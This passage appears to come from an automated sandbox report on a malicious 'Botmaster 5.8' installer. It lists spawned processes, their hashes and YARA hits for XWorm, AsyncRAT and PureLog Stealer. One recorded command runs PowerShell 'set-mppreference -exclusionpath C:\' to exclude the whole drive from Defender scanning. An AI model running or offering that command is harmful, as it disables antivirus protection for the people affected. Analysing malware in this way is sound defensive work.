                                                                                                                                                                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000013.00000002.2489538224.0000000002752000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                General

                                                                                                                                                                                                                Target ID:20
                                                                                                                                                                                                                Start time:17:45:46
                                                                                                                                                                                                                Start date:10/03/2024
                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c powershell set-mppreference -exclusionpath C:\
                                                                                                                                                                                                                Imagebase:0x240000
                                                                                                                                                                                                                File size:236'544 bytes
                                                                                                                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                General

                                                                                                                                                                                                                Target ID:21
                                                                                                                                                                                                                Start time:17:45:46
                                                                                                                                                                                                                Start date:10/03/2024
                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                General

                                                                                                                                                                                                                Target ID:22
                                                                                                                                                                                                                Start time:17:45:47
                                                                                                                                                                                                                Start date:10/03/2024
                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                Commandline:powershell set-mppreference -exclusionpath C:\
                                                                                                                                                                                                                Imagebase:0x3b0000
                                                                                                                                                                                                                File size:433'152 bytes
                                                                                                                                                                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                General

                                                                                                                                                                                                                Target ID:24
                                                                                                                                                                                                                Start time:17:45:53
                                                                                                                                                                                                                Start date:10/03/2024
                                                                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\XClient.exe
                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Roaming\XClient.exe"
                                                                                                                                                                                                                Imagebase:0xc0000
                                                                                                                                                                                                                File size:56'368 bytes
                                                                                                                                                                                                                MD5 hash:FDA8C8F2A4E100AFB14C13DFCBCAB2D2
                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                General

                                                                                                                                                                                                                Target ID:25
                                                                                                                                                                                                                Start time:17:45:53
                                                                                                                                                                                                                Start date:10/03/2024
                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                General

                                                                                                                                                                                                                Target ID:26
                                                                                                                                                                                                                Start time:17:45:57
                                                                                                                                                                                                                Start date:10/03/2024
                                                                                                                                                                                                                Path:C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exe
                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                Commandline:C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exe
                                                                                                                                                                                                                Imagebase:0xda0000
                                                                                                                                                                                                                File size:2'941'952 bytes
                                                                                                                                                                                                                MD5 hash:895F3A548FD8FA6FD1355AF6D218DA2C
                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                • Detection: 0%, Virustotal, Browse
                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                General

                                                                                                                                                                                                                Target ID:27
                                                                                                                                                                                                                Start time:17:45:58
                                                                                                                                                                                                                Start date:10/03/2024
                                                                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                Imagebase:0x7ff6eef20000
                                                                                                                                                                                                                File size:55'320 bytes
                                                                                                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                General

                                                                                                                                                                                                                Target ID:29
                                                                                                                                                                                                                Start time:17:46:00
                                                                                                                                                                                                                Start date:10/03/2024
                                                                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe" --embedded-browser-webview=1 --webview-exe-name=BotMaster.exe --webview-exe-version=5.8.0.1 --user-data-dir="C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView" --noerrdialogs --embedded-browser-webview-dpi-awareness=0 --enable-features=MojoIpcz --mojo-named-platform-channel-pipe=6256.5040.8042992908347816484
                                                                                                                                                                                                                Imagebase:0x7ff7bc7d0000
                                                                                                                                                                                                                File size:3'749'328 bytes
                                                                                                                                                                                                                MD5 hash:9909D978B39FB7369F511D8506C17CA0
                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                General

                                                                                                                                                                                                                Target ID:30
                                                                                                                                                                                                                Start time:17:46:00
                                                                                                                                                                                                                Start date:10/03/2024
                                                                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe" --type=crashpad-handler --user-data-dir=C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Crashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=117.0.5938.132 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe" --annotation=plat=Win64 "--annotation=prod=Edge WebView2" --annotation=ver=117.0.2045.47 --initial-client-data=0x15c,0x160,0x164,0x138,0x170,0x7ffdfb488e88,0x7ffdfb488e98,0x7ffdfb488ea8
                                                                                                                                                                                                                Imagebase:0x7ff7bc7d0000
                                                                                                                                                                                                                File size:3'749'328 bytes
                                                                                                                                                                                                                MD5 hash:9909D978B39FB7369F511D8506C17CA0
                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                General

                                                                                                                                                                                                                Target ID:31
                                                                                                                                                                                                                Start time:17:46:01
                                                                                                                                                                                                                Start date:10/03/2024
                                                                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe" --type=gpu-process --noerrdialogs --user-data-dir="C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView" --webview-exe-name=BotMaster.exe --webview-exe-version=5.8.0.1 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1736 --field-trial-handle=1752,i,18154271516783547478,6264657338020236319,262144 --enable-features=MojoIpcz /prefetch:2
                                                                                                                                                                                                                Imagebase:0x7ff7bc7d0000
                                                                                                                                                                                                                File size:3'749'328 bytes
                                                                                                                                                                                                                MD5 hash:9909D978B39FB7369F511D8506C17CA0
                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                General

                                                                                                                                                                                                                Target ID:32
                                                                                                                                                                                                                Start time:17:46:01
                                                                                                                                                                                                                Start date:10/03/2024
                                                                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView" --webview-exe-name=BotMaster.exe --webview-exe-version=5.8.0.1 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --mojo-platform-channel-handle=2196 --field-trial-handle=1752,i,18154271516783547478,6264657338020236319,262144 --enable-features=MojoIpcz /prefetch:3
                                                                                                                                                                                                                Imagebase:0x7ff7bc7d0000
                                                                                                                                                                                                                File size:3'749'328 bytes
                                                                                                                                                                                                                MD5 hash:9909D978B39FB7369F511D8506C17CA0
                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                General

                                                                                                                                                                                                                Target ID:33
                                                                                                                                                                                                                Start time:17:46:01
                                                                                                                                                                                                                Start date:10/03/2024
                                                                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\XClient.exe
                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                Commandline:C:\Users\user\AppData\Roaming\XClient.exe
                                                                                                                                                                                                                Imagebase:0x3c0000
                                                                                                                                                                                                                File size:56'368 bytes
                                                                                                                                                                                                                MD5 hash:FDA8C8F2A4E100AFB14C13DFCBCAB2D2
                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                General

                                                                                                                                                                                                                Target ID:34
                                                                                                                                                                                                                Start time:17:46:01
                                                                                                                                                                                                                Start date:10/03/2024
                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\WinUpdate.exe
                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\WinUpdate.exe"
                                                                                                                                                                                                                Imagebase:0x2b0000
                                                                                                                                                                                                                File size:3'511'296 bytes
                                                                                                                                                                                                                MD5 hash:F24A4D5B6036A3DE2EBA88868BD771F2
                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000022.00000002.2346424155.0000000002CD6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000022.00000002.2402369053.0000000005F49000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000022.00000002.2346424155.0000000002CDE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000022.00000002.2346424155.00000000029A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000022.00000002.2346424155.0000000002CBF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000022.00000002.2402369053.000000000587D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000022.00000002.2346424155.0000000002CC2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                General

                                                                                                                                                                                                                Target ID:35
                                                                                                                                                                                                                Start time:17:46:01
                                                                                                                                                                                                                Start date:10/03/2024
                                                                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-GB --service-sandbox-type=service --noerrdialogs --user-data-dir="C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView" --webview-exe-name=BotMaster.exe --webview-exe-version=5.8.0.1 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --mojo-platform-channel-handle=2488 --field-trial-handle=1752,i,18154271516783547478,6264657338020236319,262144 --enable-features=MojoIpcz /prefetch:8
                                                                                                                                                                                                                Imagebase:0x7ff7bc7d0000
                                                                                                                                                                                                                File size:3'749'328 bytes
                                                                                                                                                                                                                MD5 hash:9909D978B39FB7369F511D8506C17CA0
                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                General

                                                                                                                                                                                                                Target ID:36
                                                                                                                                                                                                                Start time:17:46:02
                                                                                                                                                                                                                Start date:10/03/2024
                                                                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe" --type=renderer --noerrdialogs --user-data-dir="C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView" --webview-exe-name=BotMaster.exe --webview-exe-version=5.8.0.1 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --disable-nacl --first-renderer-process --lang=en-GB --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc --ms-user-locale=en_CH" --time-ticks-at-unix-epoch=-1710082776110454 --launch-time-ticks=6386081770 --mojo-platform-channel-handle=3380 --field-trial-handle=1752,i,18154271516783547478,6264657338020236319,262144 --enable-features=MojoIpcz /prefetch:1
                                                                                                                                                                                                                Imagebase:0x7ff7bc7d0000
                                                                                                                                                                                                                File size:3'749'328 bytes
                                                                                                                                                                                                                MD5 hash:9909D978B39FB7369F511D8506C17CA0
                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                General

                                                                                                                                                                                                                Target ID:37
                                                                                                                                                                                                                Start time:17:46:04
                                                                                                                                                                                                                Start date:10/03/2024
                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                General

                                                                                                                                                                                                                Target ID:38
                                                                                                                                                                                                                Start time:17:46:05
                                                                                                                                                                                                                Start date:10/03/2024
                                                                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe" --type=renderer --noerrdialogs --user-data-dir="C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView" --webview-exe-name=BotMaster.exe --webview-exe-version=5.8.0.1 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --disable-nacl --disable-gpu-compositing --lang=en-GB --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc --ms-user-locale=en_CH" --time-ticks-at-unix-epoch=-1710082776110454 --launch-time-ticks=6388632569 --mojo-platform-channel-handle=3928 --field-trial-handle=1752,i,18154271516783547478,6264657338020236319,262144 --enable-features=MojoIpcz /prefetch:1
                                                                                                                                                                                                                Imagebase:0x7ff7bc7d0000
                                                                                                                                                                                                                File size:3'749'328 bytes
                                                                                                                                                                                                                MD5 hash:9909D978B39FB7369F511D8506C17CA0
                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                General

                                                                                                                                                                                                                Target ID:39
                                                                                                                                                                                                                Start time:17:46:06
                                                                                                                                                                                                                Start date:10/03/2024
                                                                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe" --type=renderer --noerrdialogs --user-data-dir="C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView" --webview-exe-name=BotMaster.exe --webview-exe-version=5.8.0.1 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --disable-nacl --disable-gpu-compositing --lang=en-GB --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc --ms-user-locale=en_CH" --time-ticks-at-unix-epoch=-1710082776110454 --launch-time-ticks=6390330874 --mojo-platform-channel-handle=4280 --field-trial-handle=1752,i,18154271516783547478,6264657338020236319,262144 --enable-features=MojoIpcz /prefetch:1
                                                                                                                                                                                                                Imagebase:0x7ff7bc7d0000
                                                                                                                                                                                                                File size:3'749'328 bytes
                                                                                                                                                                                                                MD5 hash:9909D978B39FB7369F511D8506C17CA0
                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                General

                                                                                                                                                                                                                Target ID:40
                                                                                                                                                                                                                Start time:17:46:10
                                                                                                                                                                                                                Start date:10/03/2024
                                                                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\XClient.exe
                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Roaming\XClient.exe"
                                                                                                                                                                                                                Imagebase:0xae0000
                                                                                                                                                                                                                File size:56'368 bytes
                                                                                                                                                                                                                MD5 hash:FDA8C8F2A4E100AFB14C13DFCBCAB2D2
                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                General

                                                                                                                                                                                                                Target ID:41
                                                                                                                                                                                                                Start time:17:46:10
                                                                                                                                                                                                                Start date:10/03/2024
                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                General

                                                                                                                                                                                                                Target ID:42
                                                                                                                                                                                                                Start time:17:46:18
                                                                                                                                                                                                                Start date:10/03/2024
                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exe
                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exe"
                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                File size:3'178'277 bytes
                                                                                                                                                                                                                MD5 hash:C9C01FDC7D3AD84CEEB43C6B099A8AD5
                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                General

                                                                                                                                                                                                                Target ID:43
                                                                                                                                                                                                                Start time:17:46:18
                                                                                                                                                                                                                Start date:10/03/2024
                                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                                                                                                                Imagebase:0xbe0000
                                                                                                                                                                                                                File size:56'368 bytes
                                                                                                                                                                                                                MD5 hash:FDA8C8F2A4E100AFB14C13DFCBCAB2D2
                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000002B.00000002.2511613578.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000002B.00000002.2519566978.0000000003041000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000002B.00000002.2519566978.0000000003041000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                General

                                                                                                                                                                                                                Target ID:45
                                                                                                                                                                                                                Start time:17:47:00
                                                                                                                                                                                                                Start date:10/03/2024
                                                                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\XClient.exe
                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                Commandline:C:\Users\user\AppData\Roaming\XClient.exe
                                                                                                                                                                                                                Imagebase:0xee0000
                                                                                                                                                                                                                File size:56'368 bytes
                                                                                                                                                                                                                MD5 hash:FDA8C8F2A4E100AFB14C13DFCBCAB2D2
                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                General

                                                                                                                                                                                                                Target ID:46
                                                                                                                                                                                                                Start time:17:47:00
                                                                                                                                                                                                                Start date:10/03/2024
                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                General

                                                                                                                                                                                                                Target ID:49
                                                                                                                                                                                                                Start time:17:48:00
                                                                                                                                                                                                                Start date:10/03/2024
                                                                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\XClient.exe
                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                Commandline:C:\Users\user\AppData\Roaming\XClient.exe
                                                                                                                                                                                                                Imagebase:0x3c0000
                                                                                                                                                                                                                File size:56'368 bytes
                                                                                                                                                                                                                MD5 hash:FDA8C8F2A4E100AFB14C13DFCBCAB2D2
                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                General

                                                                                                                                                                                                                Target ID:50
                                                                                                                                                                                                                Start time:17:48:00
                                                                                                                                                                                                                Start date:10/03/2024
                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                General

                                                                                                                                                                                                                Target ID:51
                                                                                                                                                                                                                Start time:17:48:02
                                                                                                                                                                                                                Start date:10/03/2024
                                                                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --noerrdialogs --user-data-dir="C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView" --webview-exe-name=BotMaster.exe --webview-exe-version=5.8.0.1 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAABEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=4484 --field-trial-handle=1752,i,18154271516783547478,6264657338020236319,262144 --enable-features=MojoIpcz /prefetch:2
                                                                                                                                                                                                                Imagebase:0x7ff7bc7d0000
                                                                                                                                                                                                                File size:3'749'328 bytes
